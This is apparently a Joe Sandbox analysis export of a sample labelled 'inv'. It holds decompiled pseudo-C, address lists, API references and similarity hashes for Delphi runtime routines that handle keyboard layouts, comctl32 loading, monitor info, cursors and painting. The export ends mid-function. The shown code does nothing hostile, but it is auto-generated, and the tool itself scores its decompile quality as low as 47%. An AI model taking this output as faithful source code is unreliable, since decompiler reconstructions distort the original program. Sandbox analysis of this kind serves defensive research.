                                  0x00449154
                                  0x0044915c
                                  0x0044915f
                                  0x00449162
                                  0x00449172
                                  0x00448ff8
                                  0x00449007
                                  0x00449010
                                  0x00449023
                                  0x00449026
                                  0x00449143
                                  0x00449149
                                  0x0044914f
                                  0x00000000
                                  0x0044902c
                                  0x0044902d
                                  0x00449036
                                  0x00449039
                                  0x00449045
                                  0x00000000
                                  0x0044904b
                                  0x0044905d
                                  0x00449063
                                  0x0044908d
                                  0x00000000
                                  0x00449093
                                  0x00449095
                                  0x00449096
                                  0x0044909b
                                  0x0044909e
                                  0x004490a1
                                  0x004490c7
                                  0x004490da
                                  0x004490f2
                                  0x00449100
                                  0x00449113
                                  0x00449113
                                  0x00449100
                                  0x0044911a
                                  0x0044911d
                                  0x00449120
                                  0x0044912e
                                  0x0044912e
                                  0x0044908d
                                  0x00000000
                                  0x00449136
                                  0x00449136
                                  0x0044913a
                                  0x0044913a
                                  0x0044913a
                                  0x00000000
                                  0x00449039
                                  0x00449026
                                  0x00000000

                                  APIs
                                  • GetKeyboardLayoutList.USER32(00000040,?,00000000,00449173,?,02191320,?,004491D5,00000000,?,0042E3DF), ref: 0044901E
                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00449086
                                  • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0044912F,?,80000002,00000000), ref: 004490C0
                                  • RegCloseKey.ADVAPI32(?,00449136,00000000,?,00000100,00000000,0044912F,?,80000002,00000000), ref: 00449129
                                  Strings
                                  • layout text, xrefs: 004490B7
                                  • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00449070
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CloseKeyboardLayoutListOpenQueryValue
                                  • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                  • API String ID: 1703357764-2652665750
                                  • Opcode ID: 12775d2584473edc3e086760544049d5cfd815eb7e8b5b21e4d1740e175ea691
                                  • Instruction ID: 4309b47ac8640d6fc7b7e1fbda4dd74930839395904a5e9ccf664e757c01b06c
                                  • Opcode Fuzzy Hash: 12775d2584473edc3e086760544049d5cfd815eb7e8b5b21e4d1740e175ea691
                                  • Instruction Fuzzy Hash: 09416874A0060AAFEB10DF55C986B9EB7F8EF48304F5040A6E904E7391D738AE44DB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00439AE8, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E00439AE8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x44fb98 == 0) {
					 *0x44fb98 = E0040B8C0("comctl32.dll", __eax);
					if( *0x44fb98 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x44fb9c = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E004199BC(_t43, 1, 0);
				_push(_t45);
				_push(0x439be2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x44fb9c == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E00438A30(_t28);
					_push(_t11);
					L00421AE8();
					if(_t11 == 0) {
						_t33 =  *0x44dea0; // 0x41a280
						E0040B12C(_t33, 1);
						E0040384C();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E00438A30(_t28));
					if( *0x44fb9c() != 0) {
						_t34 =  *0x44dea0; // 0x41a280
						E0040B12C(_t34, 1);
						E0040384C();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x439be9);
				return E004030D8(_v8);
			}
















                                  0x00439ae9
                                  0x00439aec
                                  0x00439aef
                                  0x00439af1
                                  0x00439afa
                                  0x00439b06
                                  0x00439b15
                                  0x00439b21
                                  0x00439b25
                                  0x00439b32
                                  0x00439b32
                                  0x00439b25
                                  0x00439b15
                                  0x00439b47
                                  0x00439b4c
                                  0x00439b4d
                                  0x00439b52
                                  0x00439b55
                                  0x00439b5f
                                  0x00439b99
                                  0x00439b9e
                                  0x00439ba0
                                  0x00439ba0
                                  0x00439ba3
                                  0x00439ba6
                                  0x00439bab
                                  0x00439bac
                                  0x00439bb3
                                  0x00439bb5
                                  0x00439bc2
                                  0x00439bc7
                                  0x00439bc7
                                  0x00439b61
                                  0x00439b61
                                  0x00439b66
                                  0x00439b68
                                  0x00439b68
                                  0x00439b6b
                                  0x00439b6c
                                  0x00439b75
                                  0x00439b7e
                                  0x00439b80
                                  0x00439b8d
                                  0x00439b92
                                  0x00439b92
                                  0x00439b7e
                                  0x00439bce
                                  0x00439bd1
                                  0x00439bd4
                                  0x00439be1

                                  APIs
                                    • Part of subcall function 0040B8C0: 739414E0.VERSION(00000000,?,00000000,0040B996), ref: 0040B902
                                    • Part of subcall function 0040B8C0: 739414C0.VERSION(00000000,?,00000000,?,00000000,0040B979,?,00000000,?,00000000,0040B996), ref: 0040B937
                                    • Part of subcall function 0040B8C0: 73941500.VERSION(?,0040B9A8,?,?,00000000,?,00000000,?,00000000,0040B979,?,00000000,?,00000000,0040B996), ref: 0040B951
                                  • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00439B1C
                                  • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00439B2D
                                  • 73451DE0.COMCTL32(00000000,?,00000000,00439BE2), ref: 00439BAC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: 739414$7345173941500AddressHandleModuleProc
                                  • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                  • API String ID: 978676473-3125200627
                                  • Opcode ID: 2f4d8f0786d22d9757a7acfb13d52452219a73ab715ccb4e3ca8683d61c2122c
                                  • Instruction ID: 55bdc23a83d85f2e94e5fb254606b97d640af6c5d2aa8e840b43bc5e2b927e10
                                  • Opcode Fuzzy Hash: 2f4d8f0786d22d9757a7acfb13d52452219a73ab715ccb4e3ca8683d61c2122c
                                  • Instruction Fuzzy Hash: 0B21A3706002019BD700AB7AEC92A2A76ACEB4A744F50543BF401D7791DBF9FC04CA5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00422010, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E00422010(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x44f926 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00405F88();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x44f910; // 0x422010
					 *0x44f910 = E00421B38(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x44f910(_t27, _t29);
				}
				return _t24;
			}














                                  0x00422019
                                  0x0042201c
                                  0x00422026
                                  0x0042204b
                                  0x00422053
                                  0x00422073
                                  0x00422078
                                  0x00422083
                                  0x0042208e
                                  0x00422098
                                  0x00422099
                                  0x0042209a
                                  0x0042209b
                                  0x0042209c
                                  0x0042209d
                                  0x004220a7
                                  0x004220a9
                                  0x004220b1
                                  0x004220b2
                                  0x004220b2
                                  0x004220b7
                                  0x004220b7
                                  0x00422028
                                  0x0042202d
                                  0x0042203a
                                  0x00422047
                                  0x00422047
                                  0x004220c1

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422068
                                  • GetSystemMetrics.USER32 ref: 0042207D
                                  • GetSystemMetrics.USER32 ref: 00422088
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 004220B2
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoW
                                  • API String ID: 2545840971-2774842281
                                  • Opcode ID: b0998df0330f1b4bad86789f2288225cc97ebb0186d222dcb3b169a486f3f446
                                  • Instruction ID: ebd3d5f84acc242be9ac2673272a1f43b91691de329cd4ea3eb407996b54219c
                                  • Opcode Fuzzy Hash: b0998df0330f1b4bad86789f2288225cc97ebb0186d222dcb3b169a486f3f446
                                  • Instruction Fuzzy Hash: AA113375B01324BFD7309F20AD407A7B7E8EB06310F40493AEE05972A0D3F8A804CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421F3C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E00421F3C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x44f925 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00405F88();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x44f90c; // 0x421f3c
					 *0x44f90c = E00421B38(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x44f90c(_t27, _t29);
				}
				return _t24;
			}














                                  0x00421f45
                                  0x00421f48
                                  0x00421f52
                                  0x00421f77
                                  0x00421f7f
                                  0x00421f9f
                                  0x00421fa4
                                  0x00421faf
                                  0x00421fba
                                  0x00421fc4
                                  0x00421fc5
                                  0x00421fc6
                                  0x00421fc7
                                  0x00421fc8
                                  0x00421fc9
                                  0x00421fd3
                                  0x00421fd5
                                  0x00421fdd
                                  0x00421fde
                                  0x00421fde
                                  0x00421fe3
                                  0x00421fe3
                                  0x00421f54
                                  0x00421f59
                                  0x00421f66
                                  0x00421f73
                                  0x00421f73
                                  0x00421fed

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00421F94
                                  • GetSystemMetrics.USER32 ref: 00421FA9
                                  • GetSystemMetrics.USER32 ref: 00421FB4
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00421FDE
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoA
                                  • API String ID: 2545840971-1370492664
                                  • Opcode ID: d5612affae86a99afd7f41cef56dc0961e3f3a844c1513b15b8fff1efddbb7a5
                                  • Instruction ID: cbc28cf09e0b228d2025c62d3d2fe496c550b4b0cadb463cd85aaf6a37a4e2ac
                                  • Opcode Fuzzy Hash: d5612affae86a99afd7f41cef56dc0961e3f3a844c1513b15b8fff1efddbb7a5
                                  • Instruction Fuzzy Hash: 5F1129757013146FD7208F61AD44BA7B7E8EB16310F81453BED25D72A0D3B4A804CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041EA74, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0041EA74(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L5:
					return _t16;
				} else {
					_t16 = E0041D8D8(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L5;
					} else {
						_push(0);
						L004062C0();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00405FC8();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x41eb23);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x41eb2a);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L004064F8();
						return _t31;
					}
				}
			}

















                                  0x0041ea74
                                  0x0041ea75
                                  0x0041ea77
                                  0x0041ea7f
                                  0x0041ea82
                                  0x0041ea86
                                  0x0041eb2a
                                  0x0041eb2f
                                  0x0041ea97
                                  0x0041eaa5
                                  0x0041eaaa
                                  0x0041eaae
                                  0x00000000
                                  0x0041eab0
                                  0x0041eab0
                                  0x0041eab2
                                  0x0041eab7
                                  0x0041eaba
                                  0x0041eabd
                                  0x0041eabe
                                  0x0041eac3
                                  0x0041ead0
                                  0x0041ead5
                                  0x0041ead6
                                  0x0041eadb
                                  0x0041eade
                                  0x0041eaef
                                  0x0041eaf6
                                  0x0041eaf9
                                  0x0041eafc
                                  0x0041eb09
                                  0x0041eb12
                                  0x0041eb17
                                  0x0041eb1a
                                  0x0041eb1b
                                  0x0041eb1d
                                  0x0041eb22
                                  0x0041eb22
                                  0x0041eaae

                                  APIs
                                    • Part of subcall function 0041D8D8: GetObjectA.GDI32(?,00000004), ref: 0041D8EF
                                    • Part of subcall function 0041D8D8: 72E7AEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,0041EAAA), ref: 0041D912
                                  • 72E7AC50.USER32(00000000), ref: 0041EAB2
                                  • 72E7A590.GDI32(?,00000000), ref: 0041EABE
                                  • SelectObject.GDI32(?), ref: 0041EACB
                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0041EB23,?,?,?,?,00000000), ref: 0041EAEF
                                  • SelectObject.GDI32(?,?), ref: 0041EB09
                                  • DeleteDC.GDI32(?), ref: 0041EB12
                                  • 72E7B380.USER32(00000000,?,?,?,?,0041EB2A,?,00000000,0041EB23,?,?,?,?,00000000), ref: 0041EB1D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590B380ColorDeleteTable
                                  • String ID:
                                  • API String ID: 980243606-0
                                  • Opcode ID: da598bb9ae5ca442fb2274fd34a6acf40fbf3b230eda7f4d689c98f262f45719
                                  • Instruction ID: fb2eee2bce4b2773e10e225d6051dad37eff0bcf562a2f857ae0cd7268fa4e8e
                                  • Opcode Fuzzy Hash: da598bb9ae5ca442fb2274fd34a6acf40fbf3b230eda7f4d689c98f262f45719
                                  • Instruction Fuzzy Hash: 27115475D04219ABDB10EBE5C851EAEB7BCEF08304F4184BAF905E7281D679AD508B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00449278, Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E00449278(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E00449250(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E00406630(SendMessageA(_t27, 0x84, 0, E004066A8(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                  0x00449278
                                  0x00449278
                                  0x0044927c
                                  0x0044927f
                                  0x00449281
                                  0x00449287
                                  0x004492fc
                                  0x004492fc
                                  0x00449289
                                  0x00449289
                                  0x00449290
                                  0x004492ec
                                  0x004492f7
                                  0x00000000
                                  0x00449292
                                  0x00449293
                                  0x00449298
                                  0x004492a5
                                  0x004492a9
                                  0x00000000
                                  0x004492ab
                                  0x004492ae
                                  0x004492bc
                                  0x00000000
                                  0x004492be
                                  0x004492e5
                                  0x004492e5
                                  0x004492bc
                                  0x004492a9
                                  0x00449290
                                  0x00449305

                                  APIs
                                  • GetCursorPos.USER32 ref: 00449293
                                  • WindowFromPoint.USER32(?,?), ref: 004492A0
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004492AE
                                  • GetCurrentThreadId.KERNEL32 ref: 004492B5
                                  • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 004492CE
                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004492E5
                                  • SetCursor.USER32(00000000), ref: 004492F7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                  • String ID:
                                  • API String ID: 1770779139-0
                                  • Opcode ID: fd2227761a1662cb87ad81f0f7c5a079aa445a6f871286a6069c870ce17120ec
                                  • Instruction ID: dfe76643e754acd3a4b00ca660e95e2aa664b2fb24202fa542a40df06ada87f4
                                  • Opcode Fuzzy Hash: fd2227761a1662cb87ad81f0f7c5a079aa445a6f871286a6069c870ce17120ec
                                  • Instruction Fuzzy Hash: 220188322412013AEA203AB55C86B7F3658EF81755F11087FB605762C6E97D8C11626D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AFA8, Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040AFA8(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040AE20(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x44e014; // 0x44f048
				if( *_t14 == 0) {
					_t16 =  *0x44ddec; // 0x4069b0
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x44f664; // 0x400000
					LoadStringA(E00404E7C(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x44de3c; // 0x44f218
				E00402824(E00402980(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00408128( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40b06c, 2,  &_v1092, 0);
			}












                                  0x0040afb7
                                  0x0040afbc
                                  0x0040afc4
                                  0x0040b02b
                                  0x0040b030
                                  0x0040b034
                                  0x0040b03f
                                  0x00000000
                                  0x0040b055
                                  0x0040afc6
                                  0x0040afd0
                                  0x0040afdf
                                  0x0040afef
                                  0x0040b002
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0040AE20: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AE3D
                                    • Part of subcall function 0040AE20: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AE61
                                    • Part of subcall function 0040AE20: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AE7C
                                    • Part of subcall function 0040AE20: LoadStringA.USER32 ref: 0040AF12
                                  • CharToOemA.USER32 ref: 0040AFDF
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040AFFC
                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B002
                                  • GetStdHandle.KERNEL32(000000F4,0040B06C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B017
                                  • WriteFile.KERNEL32(00000000,000000F4,0040B06C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B01D
                                  • LoadStringA.USER32 ref: 0040B03F
                                  • MessageBoxA.USER32 ref: 0040B055
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                  • String ID:
                                  • API String ID: 185507032-0
                                  • Opcode ID: 2f4d012c33f209a91f8428be797ca667ec68b43c005e2170dbab65bcb9e84aff
                                  • Instruction ID: 4f6bfba07490a23bffdc6b2f7c58a44c245cf6171cc857a86fc7991de4ec66dc
                                  • Opcode Fuzzy Hash: 2f4d012c33f209a91f8428be797ca667ec68b43c005e2170dbab65bcb9e84aff
                                  • Instruction Fuzzy Hash: 231170B65042046ED200FBA5CC46F9B77ECAB45704F80453BB794F60E2DA78E9088B6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444DCC, Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00444DCC(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x444f9a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0042BA34(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E0042A82C( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E00430258(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x444fa8);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E0041C700( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E0041C700( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
